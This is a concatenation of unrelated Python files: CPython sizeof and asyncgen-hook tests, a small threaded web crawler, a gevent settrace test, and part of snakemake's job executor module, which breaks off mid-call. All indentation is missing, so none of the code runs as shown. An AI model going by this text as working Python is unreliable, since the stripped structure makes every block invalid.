check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'5P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
Crawler.py
|
import FileSystem, re
from threading import Thread
from urllib.parse import quote
from Webpage import Webpage
from colorama import Fore, Style
class Crawler(object):
def __init__(self, urls):
self.urls = urls
self.found_urls = []
self.threads = []
def error(err, err_code):
print(Fore.RED + 'CRAWLER error %s:%s' % (err_code, err, ))
print(Style.RESET_ALL)
def crawl(self):
if self.urls:
while len(self.urls) > 0:
t = Thread(target=self.get_url_contents(self.urls[0]))
t.deamon = True
t.start()
self.threads.append(t)
del(self.urls[0])
# Set page in filesystem
def set_page(self, url, page_contents):
url = re.sub('^(http://|https://)?', '', url)
url = quote(url)
# Creates a directory and paste the contents into a file.
FileSystem.set_data(url, page_contents)
def get_url_contents(self, url):
# Get url contents
page = Webpage(url)
response = page.get_page()
try:
if not response == '':
self.set_page(url, response)
except Exception as e:
self.error(e, '0x1')
if not response == '':
anchors = page.get_anchors(response)
# Repeat the crawl function for every anchor found
for anchor in anchors:
self.found_urls.append(anchor[0])
|
test__threading_vs_settrace.py
|
from __future__ import print_function
import sys
import subprocess
import unittest
import gevent.thread
script = """
from gevent import monkey
monkey.patch_all()
import sys, os, threading, time
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
time.sleep(0.1)
sys.stdout.write('..program blocked; aborting!')
sys.stdout.flush()
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
def trace(frame, event, arg):
if threading is not None:
threading.currentThread()
return trace
def doit():
sys.stdout.write("..thread started..")
def test1():
t = threading.Thread(target=doit)
t.start()
t.join()
sys.settrace(None)
sys.settrace(trace)
if len(sys.argv) > 1:
test1()
sys.stdout.write("..finishing..")
"""
class ThreadTrace(unittest.TestCase):
def test_untraceable_lock(self):
if hasattr(sys, 'gettrace'):
old = sys.gettrace()
else:
old = None
lst = []
try:
def trace(frame, ev, arg):
lst.append((frame.f_code.co_filename, frame.f_lineno, ev))
print("TRACE: %s:%s %s" % lst[-1])
return trace
with gevent.thread.allocate_lock():
sys.settrace(trace)
finally:
sys.settrace(old)
self.failUnless(lst == [], "trace not empty")
def run_script(self, more_args=[]):
rc = subprocess.call([sys.executable, "-c", script] + more_args)
self.failIf(rc == 2, "interpreter was blocked")
self.failUnless(rc == 0, "Unexpected error")
def test_finalize_with_trace(self):
self.run_script()
def test_bootstrap_inner_with_trace(self):
self.run_script(["1"])
if __name__ == "__main__":
try:
from test import support
except ImportError:
from test import test_support as support
support.run_unittest(ThreadTrace)
|
__init__.py
|
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2022, Johannes Köster"
__email__ = "johannes.koester@uni-due.de"
__license__ = "MIT"
from abc import abstractmethod
import os
import sys
import contextlib
import time
import datetime
import json
import textwrap
import stat
import shutil
import shlex
import threading
import concurrent.futures
import subprocess
import signal
import tempfile
import threading
from functools import partial
from itertools import chain
from collections import namedtuple
from snakemake.executors.common import format_cli_arg, format_cli_pos_arg, join_cli_args
from snakemake.io import _IOFile
import random
import base64
import uuid
import re
import math
from snakemake.jobs import Job
from snakemake.shell import shell
from snakemake.logging import logger
from snakemake.stats import Stats
from snakemake.utils import format, Unformattable, makedirs
from snakemake.io import get_wildcard_names, Wildcards
from snakemake.exceptions import print_exception, get_exception_origin
from snakemake.exceptions import format_error, RuleException, log_verbose_traceback
from snakemake.exceptions import (
ProtectedOutputException,
WorkflowError,
ImproperShadowException,
SpawnedJobError,
CacheMissException,
)
from snakemake.common import (
Mode,
__version__,
get_container_image,
get_uuid,
lazy_property,
)
# TODO move each executor into a separate submodule
def sleep():
# do not sleep on CI. In that case we just want to quickly test everything.
if os.environ.get("CI") != "true":
time.sleep(10)
else:
time.sleep(1)
class AbstractExecutor:
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
printthreads=True,
keepincomplete=False,
):
self.workflow = workflow
self.dag = dag
self.quiet = quiet
self.printreason = printreason
self.printshellcmds = printshellcmds
self.printthreads = printthreads
self.latency_wait = workflow.latency_wait
self.keepincomplete = keepincomplete
def get_default_remote_provider_args(self):
return join_cli_args(
[
self.workflow_property_to_arg("default_remote_prefix"),
self.workflow_property_to_arg("default_remote_provider", attr="name"),
]
)
def get_set_resources_args(self):
return format_cli_arg(
"--set-resources",
[
f"{rule}:{name}={value}"
for rule, res in self.workflow.overwrite_resources.items()
for name, value in res.items()
],
skip=not self.workflow.overwrite_resources,
)
def get_default_resources_args(self, default_resources=None):
default_resources = default_resources or self.workflow.default_resources
return format_cli_arg("--default-resources", default_resources.args)
def run_jobs(self, jobs, callback=None, submit_callback=None, error_callback=None):
"""Run a list of jobs that is ready at a given point in time.
By default, this method just runs each job individually.
This method can be overwritten to submit many jobs in a more efficient way than one-by-one.
Note that in any case, for each job, the callback functions have to be called individually!
"""
for job in jobs:
self.run(
job,
callback=callback,
submit_callback=submit_callback,
error_callback=error_callback,
)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
"""Run a specific job or group job."""
self._run(job)
callback(job)
def shutdown(self):
pass
def cancel(self):
pass
def _run(self, job):
job.check_protected_output()
self.printjob(job)
def rule_prefix(self, job):
return "local " if job.is_local else ""
def printjob(self, job):
job.log_info(skip_dynamic=True)
def print_job_error(self, job, msg=None, **kwargs):
job.log_error(msg, **kwargs)
def handle_job_success(self, job):
pass
def handle_job_error(self, job):
pass
class DryrunExecutor(AbstractExecutor):
def printjob(self, job):
super().printjob(job)
if job.is_group():
for j in job.jobs:
self.printcache(j)
else:
self.printcache(job)
def printcache(self, job):
if self.workflow.is_cached_rule(job.rule):
if self.workflow.output_file_cache.exists(job):
logger.info(
"Output file {} will be obtained from global between-workflow cache.".format(
job.output[0]
)
)
else:
logger.info(
"Output file {} will be written to global between-workflow cache.".format(
job.output[0]
)
)
class RealExecutor(AbstractExecutor):
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
assume_shared_fs=True,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
keepincomplete=keepincomplete,
)
self.assume_shared_fs = assume_shared_fs
self.stats = Stats()
self.snakefile = workflow.main_snakefile
def register_job(self, job):
job.register()
def _run(self, job, callback=None, error_callback=None):
super()._run(job)
self.stats.report_job_start(job)
try:
self.register_job(job)
except IOError as e:
logger.info(
"Failed to set marker file for job started ({}). "
"Snakemake will work, but cannot ensure that output files "
"are complete in case of a kill signal or power loss. "
"Please ensure write permissions for the "
"directory {}".format(e, self.workflow.persistence.path)
)
def handle_job_success(
self,
job,
upload_remote=True,
handle_log=True,
handle_touch=True,
ignore_missing_output=False,
):
job.postprocess(
upload_remote=upload_remote,
handle_log=handle_log,
handle_touch=handle_touch,
ignore_missing_output=ignore_missing_output,
latency_wait=self.latency_wait,
assume_shared_fs=self.assume_shared_fs,
keep_metadata=self.workflow.keep_metadata,
)
self.stats.report_job_end(job)
def handle_job_error(self, job, upload_remote=True):
job.postprocess(
error=True,
assume_shared_fs=self.assume_shared_fs,
latency_wait=self.latency_wait,
)
def workflow_property_to_arg(
self, property, flag=None, quote=True, skip=False, invert=False, attr=None
):
if skip:
return ""
value = getattr(self.workflow, property)
if value is not None and attr is not None:
value = getattr(value, attr)
if flag is None:
flag = f"--{property.replace('_', '-')}"
if invert and isinstance(value, bool):
value = not value
return format_cli_arg(flag, value, quote=quote)
@lazy_property
def general_args(self):
"""Return a string to add to self.exec_job that includes additional
arguments from the command line. This is currently used in the
ClusterExecutor and CPUExecutor, as both were using the same
code. Both have base class of the RealExecutor.
"""
w2a = self.workflow_property_to_arg
return join_cli_args(
[
"--force",
"--keep-target-files",
"--keep-remote",
"--max-inventory-time 0",
"--nocolor",
"--notemp",
"--no-hooks",
"--nolock",
"--ignore-incomplete",
w2a("cleanup_scripts", flag="--skip-script-cleanup"),
w2a("shadow_prefix"),
w2a("use_conda"),
w2a("conda_frontend"),
w2a("conda_prefix"),
w2a("conda_base_path", skip=not self.assume_shared_fs),
w2a("use_singularity"),
w2a("singularity_prefix"),
w2a("singularity_args"),
w2a("execute_subworkflows", flag="--no-subworkflows", invert=True),
w2a("max_threads"),
w2a("use_env_modules", flag="--use-envmodules"),
w2a("keep_metadata", flag="--drop-metadata", invert=True),
w2a("wrapper_prefix"),
w2a("overwrite_threads", flag="--set-threads"),
w2a("overwrite_scatter", flag="--set-scatter"),
w2a("local_groupid", skip=self.job_specific_local_groupid),
w2a("conda_not_block_search_path_envvars"),
w2a("overwrite_configfiles", flag="--configfiles"),
w2a("config_args", flag="--config"),
w2a("printshellcmds"),
w2a("latency_wait"),
w2a("scheduler_type", flag="--scheduler"),
format_cli_arg(
"--scheduler-solver-path",
os.path.dirname(sys.executable),
skip=not self.assume_shared_fs,
),
self.get_set_resources_args(),
self.get_default_remote_provider_args(),
self.get_default_resources_args(),
self.get_workdir_arg(),
format_cli_arg("--mode", self.get_exec_mode()),
]
)
def get_workdir_arg(self):
return self.workflow_property_to_arg("overwrite_workdir", flag="--directory")
def get_job_args(self, job, **kwargs):
return join_cli_args(
[
format_cli_pos_arg(kwargs.get("target", self.get_job_targets(job))),
# Restrict considered rules for faster DAG computation.
# This does not work for updated jobs because they need
# to be updated in the spawned process as well.
format_cli_arg(
"--allowed-rules",
job.rules,
quote=False,
skip=job.is_branched or job.is_updated,
),
# Ensure that a group uses its proper local groupid.
format_cli_arg("--local-groupid", job.jobid, skip=not job.is_group()),
format_cli_arg("--cores", kwargs.get("cores", self.cores)),
format_cli_arg("--attempt", job.attempt),
format_cli_arg("--force-use-threads", not job.is_group()),
]
)
@property
def job_specific_local_groupid(self):
return True
def get_snakefile(self):
return self.snakefile
def get_job_targets(self, job):
return job.get_targets()
@abstractmethod
def get_python_executable(self):
...
@abstractmethod
def get_exec_mode(self):
...
@abstractmethod
def get_envvar_declarations(self):
...
def get_job_exec_prefix(self, job):
return ""
def get_job_exec_suffix(self, job):
return ""
def format_job_exec(self, job):
prefix = self.get_job_exec_prefix(job)
if prefix:
prefix += " &&"
suffix = self.get_job_exec_suffix(job)
if suffix:
suffix = f"&& {suffix}"
return join_cli_args(
[
prefix,
self.get_envvar_declarations(),
self.get_python_executable(),
"-m snakemake",
format_cli_arg("--snakefile", self.get_snakefile()),
self.get_job_args(job),
self.general_args,
suffix,
]
)
class TouchExecutor(RealExecutor):
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
try:
# Touching of output files will be done by handle_job_success
time.sleep(0.1)
callback(job)
except OSError as ex:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job, ignore_missing_output=True)
_ProcessPoolExceptions = (KeyboardInterrupt,)
try:
from concurrent.futures.process import BrokenProcessPool
_ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool)
except ImportError:
pass
class CPUExecutor(RealExecutor):
def __init__(
self,
workflow,
dag,
workers,
printreason=False,
quiet=False,
printshellcmds=False,
use_threads=False,
cores=1,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
keepincomplete=keepincomplete,
)
self.use_threads = use_threads
self.cores = cores
# Zero thread jobs do not need a thread, but they occupy additional workers.
# Hence we need to reserve additional workers for them.
self.workers = workers + 5
self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.workers)
@property
def job_specific_local_groupid(self):
return False
def get_job_exec_prefix(self, job):
return f"cd {self.workflow.workdir_init}"
def get_exec_mode(self):
return Mode.subprocess
def get_python_executable(self):
return sys.executable
def get_envvar_declarations(self):
return ""
def get_job_args(self, job, **kwargs):
return f"{super().get_job_args(job, **kwargs)} --quiet"
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
if job.is_group():
# if we still don't have enough workers for this group, create a new pool here
missing_workers = max(len(job) - self.workers, 0)
if missing_workers:
self.workers += missing_workers
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=self.workers
)
# the future waits for the entire group job
future = self.pool.submit(self.run_group_job, job)
else:
future = self.run_single_job(job)
future.add_done_callback(partial(self._callback, job, callback, error_callback))
def job_args_and_prepare(self, job):
job.prepare()
conda_env = (
job.conda_env.address if self.workflow.use_conda and job.conda_env else None
)
container_img = (
job.container_img_path if self.workflow.use_singularity else None
)
env_modules = job.env_modules if self.workflow.use_env_modules else None
benchmark = None
benchmark_repeats = job.benchmark_repeats or 1
if job.benchmark is not None:
benchmark = str(job.benchmark)
return (
job.rule,
job.input._plainstrings(),
job.output._plainstrings(),
job.params,
job.wildcards,
job.threads,
job.resources,
job.log._plainstrings(),
benchmark,
benchmark_repeats,
conda_env,
container_img,
self.workflow.singularity_args,
env_modules,
self.workflow.use_singularity,
self.workflow.linemaps,
self.workflow.debug,
self.workflow.cleanup_scripts,
job.shadow_dir,
job.jobid,
self.workflow.edit_notebook if self.dag.is_edit_notebook_job(job) else None,
self.workflow.conda_base_path,
job.rule.basedir,
self.workflow.sourcecache.runtime_cache_path,
)
def run_single_job(self, job):
if (
self.use_threads
or (not job.is_shadow and not job.is_run)
or job.is_template_engine
):
future = self.pool.submit(
self.cached_or_run, job, run_wrapper, *self.job_args_and_prepare(job)
)
else:
# run directive jobs are spawned into subprocesses
future = self.pool.submit(self.cached_or_run, job, self.spawn_job, job)
return future
def run_group_job(self, job):
"""Run a pipe or service group job.
This lets all items run simultaneously."""
# we only have to consider pipe or service groups because in local running mode,
# these are the only groups that will occur
futures = [self.run_single_job(j) for j in job]
n_non_service = sum(1 for j in job if not j.is_service)
while True:
n_finished = 0
for f in futures:
if f.done():
ex = f.exception()
if ex is not None:
# kill all shell commands of the other group jobs
# there can be only shell commands because the
# run directive is not allowed for pipe jobs
for j in job:
shell.kill(j.jobid)
raise ex
else:
n_finished += 1
if n_finished >= n_non_service:
# terminate all service jobs since all consumers are done
for j in job:
if j.is_service:
logger.info(
f"Terminating service job {j.jobid} since all consuming jobs are finished."
)
shell.terminate(j.jobid)
logger.info(
f"Service job {j.jobid} has been successfully terminated."
)
return
time.sleep(1)
def spawn_job(self, job):
cmd = self.format_job_exec(job)
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
raise SpawnedJobError()
def cached_or_run(self, job, run_func, *args):
"""
Either retrieve result from cache, or run job with given function.
"""
to_cache = self.workflow.is_cached_rule(job.rule)
try:
if to_cache:
self.workflow.output_file_cache.fetch(job)
return
except CacheMissException:
pass
run_func(*args)
if to_cache:
self.workflow.output_file_cache.store(job)
def shutdown(self):
self.pool.shutdown()
def cancel(self):
self.pool.shutdown()
def _callback(self, job, callback, error_callback, future):
try:
ex = future.exception()
if ex is not None:
raise ex
callback(job)
except _ProcessPoolExceptions:
self.handle_job_error(job)
# no error callback, just silently ignore the interrupt as the main scheduler is also killed
except SpawnedJobError:
# don't print error message, this is done by the spawned subprocess
error_callback(job)
except (Exception, BaseException) as ex:
self.print_job_error(job)
if not (job.is_group() or job.shellcmd) or self.workflow.verbose:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job)
def handle_job_error(self, job):
super().handle_job_error(job)
if not self.keepincomplete:
job.cleanup()
self.workflow.persistence.cleanup(job)
class ClusterExecutor(RealExecutor):
"""Backend for distributed execution.
The key idea is that a job is converted into a script that invokes Snakemake again, in whatever environment is targeted. The script is submitted to some job management platform (e.g. a cluster scheduler like slurm).
This class can be specialized to generate more specific backends, also for the cloud.
"""
default_jobscript = "jobscript.sh"
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{name}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
cluster_config=None,
local_input=None,
restart_times=None,
exec_job=None,
assume_shared_fs=True,
max_status_checks_per_second=1,
disable_default_remote_provider_args=False,
disable_default_resources_args=False,
disable_envvar_declarations=False,
keepincomplete=False,
):
from ratelimiter import RateLimiter
local_input = local_input or []
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
assume_shared_fs=assume_shared_fs,
keepincomplete=keepincomplete,
)
if not self.assume_shared_fs:
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
self.is_default_jobscript = False
jobscript = workflow.jobscript
if jobscript is None:
jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript)
self.is_default_jobscript = True
try:
with open(jobscript) as f:
self.jobscript = f.read()
except IOError as e:
raise WorkflowError(e)
if not "jobid" in get_wildcard_names(jobname):
raise WorkflowError(
'Defined jobname ("{}") has to contain the wildcard {jobid}.'
)
self.jobname = jobname
self._tmpdir = None
self.cores = cores if cores else "all"
self.cluster_config = cluster_config if cluster_config else dict()
self.restart_times = restart_times
self.active_jobs = list()
self.lock = threading.Lock()
self.wait = True
self.wait_thread = threading.Thread(target=self._wait_thread)
self.wait_thread.daemon = True
self.wait_thread.start()
self.disable_default_remote_provider_args = disable_default_remote_provider_args
self.disable_default_resources_args = disable_default_resources_args
self.disable_envvar_declarations = disable_envvar_declarations
self.max_status_checks_per_second = max_status_checks_per_second
self.status_rate_limiter = RateLimiter(
max_calls=self.max_status_checks_per_second, period=1
)
def get_default_remote_provider_args(self):
if not self.disable_default_remote_provider_args:
return super().get_default_remote_provider_args()
else:
return ""
def get_default_resources_args(self, default_resources=None):
if not self.disable_default_resources_args:
return super().get_default_resources_args(default_resources)
else:
return ""
def get_workdir_arg(self):
if self.assume_shared_fs:
return super().get_workdir_arg()
return ""
def get_envvar_declarations(self):
if not self.disable_envvar_declarations:
return " ".join(
f"{var}={repr(os.environ[var])}" for var in self.workflow.envvars
)
else:
return ""
def get_python_executable(self):
return sys.executable if self.assume_shared_fs else "python"
def get_exec_mode(self):
return Mode.cluster
def get_job_args(self, job):
waitfiles_parameter = ""
if self.assume_shared_fs:
wait_for_files = []
wait_for_files.append(self.tmpdir)
wait_for_files.extend(job.get_wait_for_files())
# Only create extra file if we have more than 20 input files.
# This should not require the file creation in most cases.
if len(wait_for_files) > 20:
wait_for_files_file = self.get_jobscript(job) + ".waitforfilesfile.txt"
with open(wait_for_files_file, "w") as fd:
print(*wait_for_files, sep="\n", file=fd)
waitfiles_parameter = format_cli_arg(
"--wait-for-files-file", wait_for_files_file
)
else:
waitfiles_parameter = format_cli_arg("--wait-for-files", wait_for_files)
return f"{super().get_job_args(job)} {waitfiles_parameter}"
def _wait_thread(self):
try:
self._wait_for_jobs()
except Exception as e:
self.workflow.scheduler.executor_error_callback(e)
def shutdown(self):
with self.lock:
self.wait = False
self.wait_thread.join()
if not self.workflow.immediate_submit:
# Only delete tmpdir (containing jobscripts) if not using
# immediate_submit. With immediate_submit, jobs can be scheduled
# after this method is completed. Hence we have to keep the
# directory.
shutil.rmtree(self.tmpdir)
def cancel(self):
self.shutdown()
def _run(self, job, callback=None, error_callback=None):
if self.assume_shared_fs:
job.remove_existing_output()
job.download_remote_input()
super()._run(job, callback=callback, error_callback=error_callback)
@property
def tmpdir(self):
if self._tmpdir is None:
self._tmpdir = tempfile.mkdtemp(dir=".snakemake", prefix="tmp.")
return os.path.abspath(self._tmpdir)
def get_jobscript(self, job):
f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job))
if os.path.sep in f:
raise WorkflowError(
"Path separator ({}) found in job name {}. "
"This is not supported.".format(os.path.sep, f)
)
return os.path.join(self.tmpdir, f)
def write_jobscript(self, job, jobscript):
exec_job = self.format_job_exec(job)
try:
content = self.jobscript.format(
properties=job.properties(cluster=self.cluster_params(job)),
exec_job=exec_job,
)
except KeyError as e:
if self.is_default_jobscript:
raise e
else:
raise WorkflowError(
f"Error formatting custom jobscript {self.workflow.jobscript}: value for {e} not found.\n"
"Make sure that your custom jobscript is defined as expected."
)
logger.debug("Jobscript:\n{}".format(content))
with open(jobscript, "w") as f:
print(content, file=f)
os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR | stat.S_IRUSR)
def cluster_params(self, job):
"""Return wildcards object for job from cluster_config."""
cluster = self.cluster_config.get("__default__", dict()).copy()
cluster.update(self.cluster_config.get(job.name, dict()))
# Format values with available parameters from the job.
for key, value in list(cluster.items()):
if isinstance(value, str):
try:
cluster[key] = job.format_wildcards(value)
except NameError as e:
if job.is_group():
msg = (
"Failed to format cluster config for group job. "
"You have to ensure that your default entry "
"does not contain any items that group jobs "
"cannot provide, like {rule}, {wildcards}."
)
else:
msg = (
"Failed to format cluster config "
"entry for job {}.".format(job.rule.name)
)
raise WorkflowError(msg, e)
return cluster
def cluster_wildcards(self, job):
return Wildcards(fromdict=self.cluster_params(job))
def handle_job_success(self, job):
super().handle_job_success(
job, upload_remote=False, handle_log=False, handle_touch=False
)
def handle_job_error(self, job):
# TODO what about removing empty remote dirs?? This cannot be decided
# on the cluster node.
super().handle_job_error(job, upload_remote=False)
logger.debug("Cleanup job metadata.")
# We have to remove metadata here as well.
# It will be removed by the CPUExecutor in case of a shared FS,
# but we might not see the removal due to filesystem latency.
# By removing it again, we make sure that it is gone on the host FS.
if not self.keepincomplete:
self.workflow.persistence.cleanup(job)
# Also cleanup the jobs output files, in case the remote job
# was not able to, due to e.g. timeout.
logger.debug("Cleanup failed jobs output files.")
job.cleanup()
def print_cluster_job_error(self, job_info, jobid):
job = job_info.job
kind = (
"rule {}".format(job.rule.name)
if not job.is_group()
else "group job {}".format(job.groupid)
)
logger.error(
"Error executing {} on cluster (jobid: {}, external: "
"{}, jobscript: {}). For error details see the cluster "
"log and the log files of the involved rule(s).".format(
kind, jobid, job_info.jobid, job_info.jobscript
)
)
GenericClusterJob = namedtuple(
"GenericClusterJob",
"job jobid callback error_callback jobscript jobfinished jobfailed",
)
class GenericClusterExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
statuscmd=None,
cancelcmd=None,
cancelnargs=None,
sidecarcmd=None,
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
):
self.submitcmd = submitcmd
if not assume_shared_fs and statuscmd is None:
raise WorkflowError(
"When no shared filesystem can be assumed, a "
"status command must be given."
)
self.statuscmd = statuscmd
self.cancelcmd = cancelcmd
self.sidecarcmd = sidecarcmd
self.cancelnargs = cancelnargs
self.external_jobid = dict()
# We need to collect all external ids so we can properly cancel even if
# the status update queue is running.
self.all_ext_jobids = list()
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
)
self.sidecar_vars = None
if self.sidecarcmd:
self._launch_sidecar()
if not statuscmd and not assume_shared_fs:
raise WorkflowError(
"If no shared filesystem is used, you have to "
"specify a cluster status command."
)
def get_job_exec_prefix(self, job):
if self.assume_shared_fs:
# quoting the workdir since it may contain spaces
return f"cd {repr(self.workflow.workdir_init)}"
else:
return ""
def get_job_exec_suffix(self, job):
if self.statuscmd:
return "exit 0 || exit 1"
elif self.assume_shared_fs:
# TODO wrap with watch and touch {jobrunning}
# check modification date of {jobrunning} in the wait_for_job method
return (
f"touch {repr(self.get_jobfinished_marker(job))} || "
f"(touch {repr(self.get_jobfailed_marker(job))}; exit 1)"
)
assert False, "bug: neither statuscmd defined nor shared FS"
def get_jobfinished_marker(self, job):
return os.path.join(self.tmpdir, "{}.jobfinished".format(job.jobid))
def get_jobfailed_marker(self, job):
return os.path.join(self.tmpdir, "{}.jobfailed".format(job.jobid))
def _launch_sidecar(self):
def copy_stdout(executor, process):
"""Run sidecar process and copy it's stdout to our stdout."""
while process.poll() is None and executor.wait:
buf = process.stdout.readline()
if buf:
sys.stdout.write(buf)
# one final time ...
buf = process.stdout.readline()
if buf:
sys.stdout.write(buf)
def wait(executor, process):
while executor.wait:
time.sleep(0.5)
process.terminate()
process.wait()
logger.info(
"Cluster sidecar process has terminated (retcode=%d)."
% process.returncode
)
logger.info("Launch sidecar process and read first output line.")
process = subprocess.Popen(
